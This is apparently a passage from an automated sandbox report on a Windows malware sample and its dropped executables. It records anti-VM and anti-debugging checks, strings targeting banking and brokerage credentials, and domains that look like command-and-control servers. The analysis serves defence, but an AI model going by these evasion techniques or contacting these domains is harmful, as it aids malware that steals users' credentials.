Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEED90 second address: FEEDB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F4D45034D23h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FEEDB3 second address: FEEDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe RDTSC instruction interceptor: First address: FF1E87 second address: FF1E8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 613B29 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 613BD3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7BDB52 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7E6D21 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 848618 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Special instruction interceptor: First address: E4EC54 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Special instruction interceptor: First address: E4C552 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Special instruction interceptor: First address: E4EB6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Special instruction interceptor: First address: 108778C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Special instruction interceptor: First address: 5316B8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Special instruction interceptor: First address: 52F696 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Special instruction interceptor: First address: 6F4EF9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Special instruction interceptor: First address: 6DF7E6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Special instruction interceptor: First address: A3DDF1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Special instruction interceptor: First address: 757A46 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Special instruction interceptor: First address: C855AD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 104EC54 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 104C552 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 104EB6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 128778C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Special instruction interceptor: First address: 1053B29 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Special instruction interceptor: First address: 1053BD3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Special instruction interceptor: First address: 11FDB52 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Special instruction interceptor: First address: 1226D21 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Special instruction interceptor: First address: 1288618 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Special instruction interceptor: First address: 3416B8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Special instruction interceptor: First address: 33F696 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Special instruction interceptor: First address: 504EF9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Special instruction interceptor: First address: 4EF7E6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Special instruction interceptor: First address: 567A46 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Memory allocated: 47B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Memory allocated: 4B20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Memory allocated: 4950000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Code function: 3_2_05400229 rdtsc 3_2_05400229
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 358
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 354
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1580
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 3375
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Window / User API: threadDelayed 710
Source: C:\Users\user\Desktop\file.exe TID: 1200 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe TID: 7368 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7748 Thread sleep count: 52 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7748 Thread sleep time: -104052s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7764 Thread sleep count: 52 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7764 Thread sleep time: -104052s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7724 Thread sleep count: 358 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7724 Thread sleep time: -10740000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7760 Thread sleep count: 46 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7760 Thread sleep time: -92046s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep count: 340 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep time: -680340s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7836 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7740 Thread sleep count: 354 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7740 Thread sleep time: -708354s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7756 Thread sleep count: 56 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7756 Thread sleep time: -112056s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7740 Thread sleep count: 1580 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7740 Thread sleep time: -3161580s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep count: 3375 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7736 Thread sleep time: -6753375s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe TID: 8036 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe TID: 8040 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe TID: 6176 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe TID: 2020 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe TID: 3680 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: skotes.exe, skotes.exe, 00000008.00000002.3336042883.00000000011D6000.00000040.00000001.01000000.0000000D.sdmp, 976d9f40c1.exe, 00000009.00000002.2804031030.00000000011DE000.00000040.00000001.01000000.0000000E.sdmp, 606f2f6db0.exe, 0000000A.00000002.2935241193.00000000004BB000.00000040.00000001.01000000.0000000F.sdmp, 976d9f40c1.exe, 0000000B.00000002.2924184615.00000000011DE000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: firefox.exe, 00000019.00000002.3175124734.0000013790400000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWu
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2120862136.0000000005A98000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000003.2094931339.0000000001066000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWq@
Source: file.exe, 00000000.00000003.2094931339.000000000107E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2201148750.000000000107B000.00000004.00000020.00020000.00000000.sdmp, 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000008.00000002.3343285649.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000008.00000002.3343285649.00000000016BC000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803355226.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000003.2803112102.00000000016E5000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806226818.000000000167E000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806413916.00000000016E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000019.00000002.3179268401.000001379A0B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.00000000012C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: firefox.exe, 00000019.00000002.3175124734.0000013790400000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RA
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwaren
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2120862136.0000000005A98000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.000000000124E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 606f2f6db0.exe, 0000000A.00000002.2936306936.0000000001294000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320903364.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareQ
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: S14AV77TIR9DRWSCWIW0.exe, 00000003.00000002.2342537971.0000000000FD6000.00000040.00000001.01000000.00000006.sdmp, 7RNKVR1EZ552XQ73.exe, 00000004.00000002.2320028060.00000000006AB000.00000040.00000001.01000000.00000007.sdmp, QDDSFWH7TPMYGYIMIOWX7SBOU5.exe, 00000005.00000002.2419062316.0000000000BC7000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 00000006.00000002.2361931041.00000000011D6000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000008.00000002.3336042883.00000000011D6000.00000040.00000001.01000000.0000000D.sdmp, 976d9f40c1.exe, 00000009.00000002.2804031030.00000000011DE000.00000040.00000001.01000000.0000000E.sdmp, 606f2f6db0.exe, 0000000A.00000002.2935241193.00000000004BB000.00000040.00000001.01000000.0000000F.sdmp, 976d9f40c1.exe, 0000000B.00000002.2924184615.00000000011DE000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000003.2120963782.00000000059D2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Code function: 5_2_00BC2448 Start: 00BC24BB End: 00BC2486 5_2_00BC2448
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Code function: 3_2_05400229 rdtsc 3_2_05400229
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Code function: 5_2_00A3B970 LdrInitializeThunk, 5_2_00A3B970
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_0101652B mov eax, dword ptr fs:[00000030h] 8_2_0101652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_0101A302 mov eax, dword ptr fs:[00000030h] 8_2_0101A302
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 7RNKVR1EZ552XQ73.exe PID: 5628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 606f2f6db0.exe PID: 8156, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe, type: DROPPED
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: clearancek.site
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: licendfilteo.site
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: spirittunek.store
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bathdoomgaz.store
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: studennotediw.store
Source: file.exe, 00000000.00000003.2068472559.0000000004E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: dissapoiznw.store
